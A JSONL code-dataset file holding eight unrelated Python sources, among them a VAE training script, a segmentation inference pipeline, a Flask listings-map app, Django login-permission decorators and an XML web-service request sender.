+{"seq_id":"474276352","text":"import argparse\nimport tensorflow as tf\nimport numpy as np\nfrom model import VBTA_semi as VBTA\nfrom utils import callback, simple_batch_generator_build_semi, make_dense\nfrom functools import partial\nimport os\nfrom get_data import get_data\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('train')\n parser.add_argument('--data', type=str, default='./mnist.npy', help='location of the data array')\n parser.add_argument('--out_path', type=str, default='./eval.npy',\n help='location of the data array for the evaulation')\n parser.add_argument('--model_save', type=str, default='./model', help='path to save model')\n parser.add_argument('--semi_supervised_size', type=int, default=10, help='size of labeled part of the dataset')\n parser.add_argument('--batch_size', type=int, default=50, help='batch size')\n parser.add_argument('--epoch_num', type=int, default=100, help='epoch num')\n parser.add_argument('--t_start', type=float, default=10.0, help='initial value of triplet coef')\n parser.add_argument('--t_end', type=float, default=10.0, help='final value of triplet coef')\n parser.add_argument('--cc_start', type=float, default=1.0, help='initial value of cc coef')\n parser.add_argument('--cc_end', type=float, default=1.0, help='final value of cc coef')\n parser.add_argument('--seed', type=int, default=42, help='random seed for the experiment repeatability ')\n args = parser.parse_args()\n\n if not os.path.exists(args.data):\n get_data(args.data)\n X_train, X_test, X_reverse_train, X_reverse_test, Labels_train, Labels_test = np.load(args.data)\n\n n_hidden = 512\n n_latent = 64\n acitv = tf.nn.relu\n n_input = X_train.shape[1]\n build_dict = {\n 'encoder_x': make_dense('encoder_x', n_hidden, acitv),\n 'encoder_y': make_dense('encoder_y', n_hidden, acitv),\n 'encoder_common_mean': make_dense('encoder_common_mean', n_latent, None),\n 'encoder_common_sigma': make_dense('encoder_common_sigma', n_latent, tf.nn.softplus),\n 'decoder_same': make_dense('decoder_same', n_hidden, acitv),\n 'decoder_x_mean': make_dense('decoder_x_mean', n_input, None),\n 'decoder_y_mean': make_dense('decoder_y_mean', n_input, None),\n }\n\n model = VBTA(n_input, n_latent, build_dict, triplet_coef=args.t_start,\n cc_coef=args.cc_start)\n rs = np.random.RandomState(args.seed)\n idx = range(X_train.shape[0])\n rs.shuffle(idx)\n semi = idx[:args.semi_supervised_size]\n\n batch_size = min(args.batch_size, args.semi_supervised_size)\n optimizer = tf.train.AdamOptimizer(10 ** (-4))\n batch_gen = simple_batch_generator_build_semi(X_train, X_reverse_train, semi,\n batch_size,\n args.epoch_num,\n model,\n args.t_start,\n args.cc_start,\n args.t_end,\n args.cc_end, rs)\n\n train_callback = partial(callback, X=X_test, Y=X_reverse_test, model_save=args.model_save)\n model.fit(optimizer, batch_gen, callback=train_callback, continue_train=False)\n model.save(args.model_save)\n # data for evaluation\n z_x = model.latent_x(X_test, noise=False)\n to_test = [t.reshape(28, 28).T.flatten() for t in model.decode_z_y(z_x)]\n np.save(args.out_path, to_test)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"321277878","text":"from sys import exit\n\nimport snake\n\nDEBUG = True\n\n# Prints error in red\n\n\ndef error(message='Unknown', token=None, raised=False):\n if token is not None:\n line, col = token.getLoc()\n print(f'\\033[91mLine {line}')\n print(snake.sourceRef[line - 1])\n print(' ' * (col - 1) + '^')\n errorType = 'Raised ' if raised else ''\n if DEBUG:\n print(f'{errorType}Error: {message}\\033[0m\\n')\n raise\n exit(f'{errorType}Error: {message}\\033[0m')\n","sub_path":"pySnake/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"628741622","text":"\"\"\"Inference script for semantic segmentation by nearest neighbor retrievals.\n\"\"\"\nfrom __future__ import print_function, division\nimport os\nimport math\n\nimport PIL.Image as Image\nimport numpy as np\nimport cv2\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom tqdm import tqdm\n\nimport spml.data.transforms as transforms\nimport spml.utils.general.vis as vis_utils\nimport spml.utils.general.common as common_utils\nimport spml.utils.general.others as other_utils\nimport spml.utils.segsort.others as segsort_others\nfrom spml.data.datasets.base_dataset import ListDataset\nfrom spml.config.default import config\nfrom spml.config.parse_args import parse_args\nfrom spml.models.embeddings.resnet_pspnet import resnet_50_pspnet, resnet_101_pspnet\nfrom spml.models.embeddings.resnet_deeplab import resnet_50_deeplab, resnet_101_deeplab\nfrom spml.models.predictions.segsort import segsort\nfrom spml.models.crf import DenseCRF\n\ncudnn.enabled = True\ncudnn.benchmark = True\n\n\ndef separate_comma(str_comma):\n ints = [int(i) for i in str_comma.split(',')]\n return ints\n\n\ndef main():\n \"\"\"Inference for semantic segmentation.\n \"\"\"\n # Retreve experiment configurations.\n args = parse_args('Inference for semantic segmentation.')\n config.network.kmeans_num_clusters = separate_comma(args.kmeans_num_clusters)\n config.network.label_divisor = args.label_divisor\n\n # Create directories to save results.\n semantic_dir = os.path.join(args.save_dir, 'semantic_gray')\n semantic_rgb_dir = os.path.join(args.save_dir, 'semantic_color')\n\n # Create color map.\n color_map = vis_utils.load_color_map(config.dataset.color_map_path)\n color_map = color_map.numpy()\n\n # Create data loaders.\n test_dataset = ListDataset(\n data_dir=args.data_dir,\n data_list=args.data_list,\n img_mean=config.network.pixel_means,\n img_std=config.network.pixel_stds,\n size=None,\n random_crop=False,\n random_scale=False,\n random_mirror=False,\n training=False)\n test_image_paths = test_dataset.image_paths\n\n # Create models.\n if config.network.backbone_types == 'panoptic_pspnet_101':\n embedding_model = resnet_101_pspnet(config).cuda()\n elif config.network.backbone_types == 'panoptic_deeplab_101':\n embedding_model = resnet_101_deeplab(config).cuda()\n else:\n raise ValueError('Not support ' + config.network.backbone_types)\n\n if config.network.prediction_types == 'segsort':\n prediction_model = segsort(config)\n else:\n raise ValueError('Not support ' + config.network.prediction_types)\n\n embedding_model = embedding_model.to(\"cuda:0\")\n prediction_model = prediction_model.to(\"cuda:0\")\n embedding_model.eval()\n prediction_model.eval()\n \n # Load trained weights.\n model_path_template = os.path.join(args.snapshot_dir, 'model-{:d}.pth')\n save_iter = config.train.max_iteration - 1\n embedding_model.load_state_dict(\n torch.load(model_path_template.format(save_iter))['embedding_model'],\n resume=True)\n prediction_model.load_state_dict(\n torch.load(model_path_template.format(save_iter))['prediction_model'])\n\n # Define CRF.\n postprocessor = DenseCRF(\n iter_max=args.crf_iter_max,\n pos_xy_std=args.crf_pos_xy_std,\n pos_w=args.crf_pos_w,\n bi_xy_std=args.crf_bi_xy_std,\n bi_rgb_std=args.crf_bi_rgb_std,\n bi_w=args.crf_bi_w,)\n\n # Load memory prototypes.\n semantic_memory_prototypes, semantic_memory_prototype_labels = None, None\n if args.semantic_memory_dir is not None:\n semantic_memory_prototypes, semantic_memory_prototype_labels = (\n segsort_others.load_memory_banks(args.semantic_memory_dir))\n semantic_memory_prototypes = semantic_memory_prototypes.to(\"cuda:0\")\n semantic_memory_prototype_labels = semantic_memory_prototype_labels.to(\"cuda:0\")\n\n # Remove ignore class.\n valid_prototypes = torch.ne(\n semantic_memory_prototype_labels,\n config.dataset.semantic_ignore_index).nonzero()\n valid_prototypes = valid_prototypes.view(-1)\n semantic_memory_prototypes = torch.index_select(\n semantic_memory_prototypes,\n 0,\n valid_prototypes)\n semantic_memory_prototype_labels = torch.index_select(\n semantic_memory_prototype_labels,\n 0,\n valid_prototypes)\n\n # Start inferencing.\n with torch.no_grad():\n for data_index in tqdm(range(len(test_dataset))):\n # Image path.\n image_path = test_image_paths[data_index]\n base_name = os.path.basename(image_path).replace('.jpg', '.png')\n\n # Image resolution.\n original_image_batch, original_label_batch, _ = test_dataset[data_index]\n image_h, image_w = original_image_batch['image'].shape[-2:]\n batches = other_utils.create_image_pyramid(\n original_image_batch, original_label_batch,\n scales=[0.5, 0.75, 1, 1.25, 1.5],\n is_flip=True)\n\n semantic_topks = []\n for image_batch, label_batch, data_info in batches:\n resize_image_h, resize_image_w = image_batch['image'].shape[-2:]\n # Crop and Pad the input image.\n image_batch['image'] = transforms.resize_with_pad(\n image_batch['image'].transpose(1, 2, 0),\n config.test.crop_size,\n image_pad_value=0).transpose(2, 0, 1)\n image_batch['image'] = torch.FloatTensor(\n image_batch['image'][np.newaxis, ...]).to(\"cuda:0\")\n pad_image_h, pad_image_w = image_batch['image'].shape[-2:]\n\n # Create the fake labels where clustering ignores 255.\n fake_label_batch = {}\n for label_name in ['semantic_label', 'instance_label']:\n lab = np.zeros((resize_image_h, resize_image_w),\n dtype=np.uint8)\n lab = transforms.resize_with_pad(\n lab,\n config.test.crop_size,\n image_pad_value=config.dataset.semantic_ignore_index)\n\n fake_label_batch[label_name] = torch.LongTensor(\n lab[np.newaxis, ...]).to(\"cuda:0\")\n\n # Put label batch to gpu 1.\n #for k, v in label_batch.items():\n # label_batch[k] = torch.LongTensor(v[np.newaxis, ...]).to(\"cuda:0\")\n\n # Create the ending index of each patch.\n stride_h, stride_w = config.test.stride\n crop_h, crop_w = config.test.crop_size\n npatches_h = math.ceil(1.0 * (pad_image_h-crop_h) / stride_h) + 1\n npatches_w = math.ceil(1.0 * (pad_image_w-crop_w) / stride_w) + 1\n patch_ind_h = np.linspace(\n crop_h, pad_image_h, npatches_h, dtype=np.int32)\n patch_ind_w = np.linspace(\n crop_w, pad_image_w, npatches_w, dtype=np.int32)\n\n # Create place holder for full-resolution embeddings.\n embeddings = {}\n counts = torch.FloatTensor(\n 1, 1, pad_image_h, pad_image_w).zero_().to(\"cuda:0\")\n for ind_h in patch_ind_h:\n for ind_w in patch_ind_w:\n sh, eh = ind_h - crop_h, ind_h\n sw, ew = ind_w - crop_w, ind_w\n crop_image_batch = {\n k: v[:, :, sh:eh, sw:ew] for k, v in image_batch.items()}\n\n # Feed-forward.\n crop_embeddings = embedding_model.generate_embeddings(\n crop_image_batch, resize_as_input=True)\n\n # Initialize embedding.\n for name in crop_embeddings:\n if crop_embeddings[name] is None:\n continue\n crop_emb = crop_embeddings[name].to(\"cuda:0\")\n if name in ['embedding']:\n crop_emb = common_utils.normalize_embedding(\n crop_emb.permute(0, 2, 3, 1).contiguous())\n crop_emb = crop_emb.permute(0, 3, 1, 2)\n else:\n continue\n\n if name not in embeddings.keys():\n embeddings[name] = torch.FloatTensor(\n 1,\n crop_emb.shape[1],\n pad_image_h,\n pad_image_w).zero_().to(\"cuda:0\")\n embeddings[name][:, :, sh:eh, sw:ew] += crop_emb\n counts[:, :, sh:eh, sw:ew] += 1\n\n for k in embeddings.keys():\n embeddings[k] /= counts\n\n # KMeans.\n lab_div = config.network.label_divisor\n fake_sem_lab = fake_label_batch['semantic_label'][..., :resize_image_h, :resize_image_w]\n fake_inst_lab = fake_label_batch['instance_label'][..., :resize_image_h, :resize_image_w]\n embs = embeddings['embedding'][..., :resize_image_h, :resize_image_w]\n clustering_outputs = embedding_model.generate_clusters(\n embs,\n fake_sem_lab,\n fake_inst_lab)\n embeddings.update(clustering_outputs)\n\n # Generate predictions.\n outputs = prediction_model(\n embeddings,\n {'semantic_memory_prototype': semantic_memory_prototypes,\n 'semantic_memory_prototype_label': semantic_memory_prototype_labels},\n with_loss=False, with_prediction=True)\n semantic_topk = common_utils.one_hot(\n outputs['semantic_score'], config.dataset.num_classes).float()\n semantic_topk = torch.mean(semantic_topk, dim=1)\n semantic_topk = semantic_topk.view(resize_image_h, resize_image_w, -1)\n semantic_topk = (\n semantic_topk.data.cpu().numpy().astype(np.float32))\n semantic_topk = cv2.resize(\n semantic_topk, (image_w, image_h), interpolation=cv2.INTER_LINEAR)\n if data_info['is_flip']:\n semantic_topk = semantic_topk[:, ::-1]\n semantic_topks.append(semantic_topk)\n\n # Save semantic predictions.\n semantic_topks = np.stack(semantic_topks, axis=0).astype(np.float32)\n semantic_prob = np.mean(semantic_topks, axis=0)\n semantic_prob = semantic_prob.transpose(2, 0, 1)\n\n # DenseCRF post-processing.\n image = original_image_batch['image'].astype(np.float32)\n image = image.transpose(1, 2, 0)\n image *= np.reshape(config.network.pixel_stds, (1, 1, 3))\n image += np.reshape(config.network.pixel_means, (1, 1, 3))\n image = image * 255\n image = image.astype(np.uint8)\n\n semantic_prob = postprocessor(image, semantic_prob)\n\n semantic_pred = np.argmax(semantic_prob, axis=0).astype(np.uint8)\n\n semantic_pred_name = os.path.join(semantic_dir, base_name)\n if not os.path.isdir(os.path.dirname(semantic_pred_name)):\n os.makedirs(os.path.dirname(semantic_pred_name))\n Image.fromarray(semantic_pred, mode='L').save(semantic_pred_name)\n\n semantic_pred_rgb = color_map[semantic_pred]\n semantic_pred_rgb_name = os.path.join(\n semantic_rgb_dir, base_name)\n if not os.path.isdir(os.path.dirname(semantic_pred_rgb_name)):\n os.makedirs(os.path.dirname(semantic_pred_rgb_name))\n Image.fromarray(semantic_pred_rgb, mode='RGB').save(\n semantic_pred_rgb_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pyscripts/inference/inference_crf_msc.py","file_name":"inference_crf_msc.py","file_ext":"py","file_size_in_byte":10808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"409583866","text":"\"\"\"\n\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 Fenimore\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\nINCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\nPURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\nLIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE\nOR OTHER DEALINGS IN THE SOFTWARE.\n\n\n\"\"\"\n\n\nimport os\nfrom datetime import datetime\n\nimport folium\nfrom flask import Flask, render_template, send_from_directory, request\n\nfrom freestuffs.stuff_scraper import StuffScraper\nfrom freestuffs.stuff_charter import StuffCharter\nfrom city_list import CITIES\n\n# initialization\napp = Flask(__name__)\napp.config.update(\n DEBUG = True,\n)\n\ndef refine_city_name(location):\n \"\"\"display User-friendly city name\"\"\"\n if location == 'newyork': # does this have to capitalized\n loc = 'New York'\n elif location == 'washingtondc':\n loc = 'Washington D.C.'\n elif location == 'sanfrancisco':\n loc = 'San Francisco'\n else:\n loc = location\n return loc\n\n\"\"\"Routes\"\"\"\n@app.route('/favicon.ico')\ndef favicon():\n \"\"\"Serve favicon\"\"\"\n return send_from_directory(os.path.join(app.root_path, 'static'), 'ico/favicon.ico')\n\n@app.errorhandler(404)\ndef page_not_found(e):\n \"\"\"Render 404.\"\"\"\n return render_template('404.html'), 404\n\n@app.route(\"/\")\ndef index():\n \"\"\"Render index.\"\"\"\n return render_template('index.html')\n\n\n@app.route(\"/cities\")\ndef list_cities():\n \"\"\"Display valid city names.\"\"\"\n cities_list = ''\n cities_list +='| User-Friendly Name | Valid for Url |
'\n for key, value in CITIES.items() :\n cities_list +=''\n cities_list += ('| ' + str(key) + ' | ' + str(value) + ' | ')\n cities_list +='
'\n cities_list += '
'\n return cities_list\n\n\n@app.route('/')\ndef list_stuff(location):\n \"\"\"Display listings\"\"\"\n stuffs = StuffScraper(location, 9).stuffs\n things =[]\n for x in range(9):\n thing = {\n 'url': stuffs[x].url,\n 'image': stuffs[x].image,\n 'place': stuffs[x].location,\n 'title': stuffs[x].thing\n }\n things.append(thing)\n refined_loc = refine_city_name(location)\n return render_template('view.html', things=things, location=location, rlocation=refined_loc)\n # location = location... brilliant\n\n\n@app.route('//map')\ndef show_map(location):\n \"\"\"Display 10 items in given city, default\"\"\"\n # FIXME: Digitalocean takes wayyy too long with 9\n stuffs = StuffScraper(location, 5, precise=True).stuffs\n treasure_map = StuffCharter(stuffs, zoom=12)\n folium_figure = treasure_map.treasure_map.get_root()\n folium_figure.header._children['bootstrap'] = folium.element.CssLink('/static/css/style.css')\n folium_figure.header._children['Woops'] = folium.element.CssLink('/static/css/map.css')\n map_path = os.path.join(app.root_path, 'templates', 'raw_map.html')\n treasure_map.save_map(map_path=map_path)\n things =[]\n for x in range(9): # Display listings on map\n thing = {\n 'url': stuffs[x].url,\n 'image': stuffs[x].image,\n 'place': stuffs[x].location,\n 'title': stuffs[x].thing\n }\n things.append(thing)\n location = refine_city_name(location)\n return render_template('map.html', location=location, things=things)\n\n@app.route('//map/')\ndef show_map_more(location, quantity):\n \"\"\"Display a specified amount of stuffs on map\"\"\"\n startTime = datetime.now() # time speed of script\n stuffs = StuffScraper(location, quantity, precise=True).stuffs\n treasure_map = StuffCharter(stuffs, zoom=12)\n folium_figure = treasure_map.treasure_map.get_root()\n folium_figure.header._children['bootstrap'] = folium.element.CssLink('/static/css/style.css')\n folium_figure.header._children['Woops'] = folium.element.CssLink('/static/css/map.css')\n map_path = os.path.join(app.root_path, 'templates', 'raw_map.html')\n treasure_map.save_map(map_path=map_path)\n things =[]\n for x in range(int(quantity)):\n thing = {\n 'url': stuffs[x].url,\n 'image': stuffs[x].image,\n 'place': stuffs[x].location,\n 'title': stuffs[x].thing\n }\n things.append(thing)\n location = refine_city_name(location)\n score = datetime.now() - startTime # efficacy?\n return render_template('map.html', location=location, things=things, score=score)\n\n@app.route('/me', methods=['POST'])\ndef me():\n if request.method == 'POST':\n location = request.form['location']\n address = request.form['address']\n #address = address + ', ' + location # this messes up if the city isn't the same as the address\n stuffs = StuffScraper(location, 9, precise=True).stuffs\n treasure_map = StuffCharter(stuffs, address=address, zoom=12)\n folium_figure = treasure_map.treasure_map.get_root()\n folium_figure.header._children['bootstrap'] = folium.element.CssLink('/static/css/style.css')\n folium_figure.header._children['Woops'] = folium.element.CssLink('/static/css/map.css')\n map_path = os.path.join(app.root_path, 'templates', 'raw_map.html')\n treasure_map.save_map(map_path=map_path)\n things =[]\n for x in range(9):\n thing = {\n 'url': stuffs[x].url,\n 'image': stuffs[x].image,\n 'place': stuffs[x].location,\n 'title': stuffs[x].thing\n }\n things.append(thing)\n location = refine_city_name(location)\n return render_template('map.html', location=location, things=things, address=address)\n\n\n# launch\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port)\n\n# Form for searching items\n# Form takes in city, as well?\n","sub_path":"treasuremap.py","file_name":"treasuremap.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"451486690","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n Created on Tue Feb 6 12:41:01 2018\n \n @ Author: Jose Jesus Torronteras Hernandez\n @ Github: https://github.com/xexuew\n @ Name: Get Train Test Data\n @ Description: \n\"\"\"\n\nimport numpy as np\nimport csv\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\nclass GetTrainTestData(object):\n \n def __init__(self, config):\n \n self.PATH = config['PATH_CONFIGURATION']['NUMPY_PATH']\n\n self.SIZE = int(config['DATA_CONFIGURATION']['DATA_SIZE'])\n self.SPLIT_SIZE = float(config['DATA_CONFIGURATION']['SPLIT_SIZE'])\n self.MULTIDIM = int(config['DATA_CONFIGURATION']['MULTIDIMENSIONAL_ARR'])\n\n #\n # Description:\n # Input:\n # Output:\n def get_features(self, genre):\n\n aux_list = []\n limit = 0\n print(\"Getting..\" + self.PATH + genre)\n \n with open(self.PATH + \"url.csv\") as f:\n\n for key, path in csv.reader(f):\n\n if key == genre:\n try:\n arr_aux = np.load(path)\n \n except UnicodeDecodeError as e:\n print(path)\n print (\"Error occurred\" + str(e))\n \n limit = limit + 1\n if limit == self.SIZE: # See config.py -> DATA_SIZE\n break\n \n aux_list.append(arr_aux)\n \n # if MULTIDIMENSIONAL_ARR is True we want a 3D array (*, * , *) for Neural Network\n if self.MULTIDIM:\n features_arr = aux_list\n else:\n features_arr = np.vstack(aux_list)\n \n return features_arr \n\n #\n # Description:\n # Input:\n # Output:\n def split_dataset(self):\n \n arr_blues = self.get_features('blues')\n arr_classical = self.get_features('classical')\n arr_country = self.get_features('country')\n arr_disco = self.get_features('disco')\n arr_hiphop = self.get_features('hiphop')\n arr_jazz = self.get_features('jazz')\n arr_metal = self.get_features('metal')\n arr_pop = self.get_features('pop')\n arr_reggae = self.get_features('reggae')\n arr_rock = self.get_features('rock')\n\n # All songs arrays\n features = np.vstack((arr_blues,\\\n arr_classical,\\\n arr_country,\\\n arr_disco,\\\n arr_hiphop,\\\n arr_jazz,\\\n arr_metal,\\\n arr_pop,\\\n arr_reggae,\\\n arr_rock))\n\n\n # Labels that identifies the musical genre\n labels = np.concatenate((np.zeros(len(arr_blues)),\\\n np.ones(len(arr_classical)),\\\n np.full(len(arr_country), 2),\\\n np.full(len(arr_disco), 3),\\\n np.full(len(arr_hiphop), 4),\\\n np.full(len(arr_jazz), 5),\\\n np.full(len(arr_metal), 6),\\\n np.full(len(arr_pop), 7),\\\n np.full(len(arr_reggae), 8),\\\n np.full(len(arr_rock), 9)))\n\n # Transforms features by scaling each feature to a given range.\n features = MinMaxScaler().fit_transform(features.reshape(-1, 625)).reshape(features.shape[0], 128, 625)\n\n # With train_test_split() it is more easier obtain the necessary elements for the later learning.\n print(\"test-size = \" + str(self.SPLIT_SIZE) + \" Change value in config.py\") # We can change the size in the config file.\n print(\"data-size = \" + str(self.SIZE) + \" Change value in config.py\") # We can change the size in the config file.\n\n X_train, X_test, y_train, y_test = train_test_split(\n features,\n labels,\n test_size = self.SPLIT_SIZE,\n random_state = 0,\n stratify = labels)\n\n print(\"X_train Tamaño: %s - X_test Tamaño: %s - y_train Tamaño: %s - y_test Tamaño: %s\" % (X_train.shape, X_test.shape, y_train.shape, y_test.shape))\n\n return X_train, X_test, y_train, y_test\n ","sub_path":"src/Get_Train_Test_Data.py","file_name":"Get_Train_Test_Data.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"339204283","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# window dimensions\nw_width = 1200\nw_height = 700\n\nplayerPath1 = ['assets/sprites/modern/','serge_run.png']\nplayerPath2 = ['assets/sprites/player/hetalia/','hetalia.png']\nplayerPath3 = ['assets/sprites/player/serge/','serge.png']\nwolfPath = ['assets/sprites/enemies/wolf/','wolf.png']\nbearPath = ['assets/sprites/enemies/scaryBear/','scaryBear.png']\narmBearPath = ['assets/sprites/enemies/armouredBear/','bear.png']\nblobPath = ['assets/sprites/enemies/blob/','blob.png']\nitemPath = ['assets/sprites/items/','crystal.png']\n\n# misc\ncolors = {'black': (0,0,0) , 'blue':(0,0,255),'green':(0,255,0),'red':(255,0, 0),'white':(255,255,255)}\nplayerSpeed = 15 # initial player speed\n\nprototype_text = [\"--KEITH IS GONE.\",\n \"...\",\n \"Keith is gone?\",\n \"That doesn't sound good.\",\n \"What does that mean? Where did Keith go?\",\n \"...\",\n \"Who is Keith?\",\n \"--THERE MAY BE A WAY FOR YOU TO RETRIEVE HIM.\",\n \"How am I supposed to retrieve him?\",\n \"--TRY THAT TIME MACHINE OVER THERE.\",\n \"Oh.\",\n \"--GO ON.\",\n \"Okay.\",\n \"Uh oh.\",\n \"I think I broke the time machine.\",\n \"...\",\n \"Yeah, it's definitely broken.\",\n \"There are pieces, like, everywhere.\",\n \"What am I supposed to do now?\",\n \"--PRESS ANY KEY TO CONTINUE.\"]\n","sub_path":"current version/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"45695753","text":"# -*- coding: utf-8 -*-\n\nimport functools\nimport logging\nlog = logging.getLogger(\"django\")\n\n# 管理员登录权限-装饰器\ndef mgr_login_required(func):\n user_type = \"mgr_user\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# 普通app 用户登录权限-装饰器\ndef app_user_login_required(func):\n user_type = \"app_user\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# 物业帐号登录权限-装饰器\ndef wuey_user_login_required(func):\n user_type = \"wuye_user\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# 通用登录权限-装饰器\ndef common_login_required(func):\n user_type = \"common\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# aio, gate 登录权限-装饰器\ndef public_dev_login_required(func):\n user_type = \"public_device\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n# wuey_user, aio, gate 登录权限-装饰器\ndef community_login_required(func):\n user_type = \"community\"\n\n @login_required(user_type=user_type)\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n return func(*args, **kwargs)\n\n return wrapper\n\n\n\n# 权限登录装饰器\ndef login_required(user_type):\n \"\"\"\n 登录权限验证\n :param user_type: mgr_user, wuye_user, app_user, gate, common, public_device\n :notice:common指允许所有类型的客户端\n \"\"\"\n\n def out_wrapper(func):\n @functools.wraps(func)\n def in_wrapper(self, *args, **kwargs):\n _map = {\n 'common': ['mgr_user', 'wuye_user', 'app_user', 'gate', 'aio'],\n 'community': ['aio', 'gate', 'wuye_user'],\n 'public_device': ['aio', 'gate'],\n }\n\n result = {'err': 0, 'msg': '', 'data': {}}\n\n if not self.request:\n result['err'] = 1\n result['msg'] = '未设置Request对象'\n return result\n\n elif not self.request.session.get(\"is_logined\", False):\n result['err'] = 2\n result['msg'] = '用户/设备未登录'\n return result\n\n log.debug(\"input_user_type:%s, user_type:%s\", user_type, self.request.session.get(\"user_type\", \"\"))\n\n if user_type in ['common', 'public_device', 'community'] and (self.request.session.get(\"user_type\", \"\") not in _map[user_type]):\n result['err'] = 4\n result['msg'] = '操作未授权'\n\n elif user_type in ['mgr_user', 'wuye_user', 'app_user', 'gate', 'aio'] and user_type != self.request.session.get(\"user_type\", \"\"):\n result['err'] = 4\n result['msg'] = '操作未授权'\n\n else:\n result = func(self, *args, **kwargs)\n \n return result\n return in_wrapper\n return out_wrapper\n","sub_path":"jmws/src/utils/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"597719913","text":"import threading\nimport queue as queue\nimport os\nfrom constant import Constant\nimport shutil\nimport requests\nclass SendRequestTask(threading.Thread):\n def __init__(self,result_queue,req_path,resp_path):\n threading.Thread.__init__(self)\n self.queue=result_queue\n self.req_path=req_path\n self.resp_path=resp_path\n def run(self):\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n for root, subdirs, files in os.walk(self.req_path):\n for name in files:\n #full_path example\n #C:\\Users\\fengmingy\\Desktop\\CBA_Test\\DnB Commercial\\1.0 Company Basic Details\\DCom-01.01.01_exp.xml\n full_path=os.path.realpath(os.path.join(root,name))\n # C:\\Users\\fengmingy\\Desktop\\CBA_Test\\1\\2\\3 i only need \\1\\2\\3 this part. +1 is because need to get rid of the first \\\n # print(os.path.join(self.req_path,root[len(self.req_path)+1:]))\n response_path=os.path.join(self.resp_path,root[len(self.req_path)+1:])\n #C:/Users/fengmingy/Desktop/CBA_Test/CBA_Comm_Request\\response\\DnB_TC_4311_req.xml fix this\n response_xml=os.path.join(response_path,name).replace(\"\\\\\",\"/\")\n # print(root)\n # print(response_path)\n # print(response_xml)\n #cant create a file in a directory that doesnt exist. so need to create that directory first\n dir = os.path.dirname(response_xml)\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n # #remove rsp file from CBA test folder\n # file_name=full_path.split(\"\\\\\")[-1]\n # if (file_name.find(\"rsp\")!=-1):\n # print (\"remove \"+full_path)\n # os.remove(full_path)\n\n # move the exptected response file to another folder\n # file_name=full_path.split(\"\\\\\")[-1]\n # if(file_name.find(\"exp\")!=-1):#find expected response file\n # shutil.move(full_path,os.path.join(dir,file_name))\n\n with open(full_path,'rb') as payload:\n #post reqeust to the url\n if(full_path.find(\"Comm\")!=-1):\n host_url=Constant.HOST_URL.COMMERICAL_URL\n else:\n host_url=Constant.HOST_URL.CONSUMER_URL\n resp=requests.post(host_url,data=payload,headers=headers)\n file=open(response_xml,'w')\n file.write(resp.text)\n self.queue.put(full_path+\" processed\")\n\n","sub_path":"test_automation_webservices/worker/WebServiceTask.py","file_name":"WebServiceTask.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
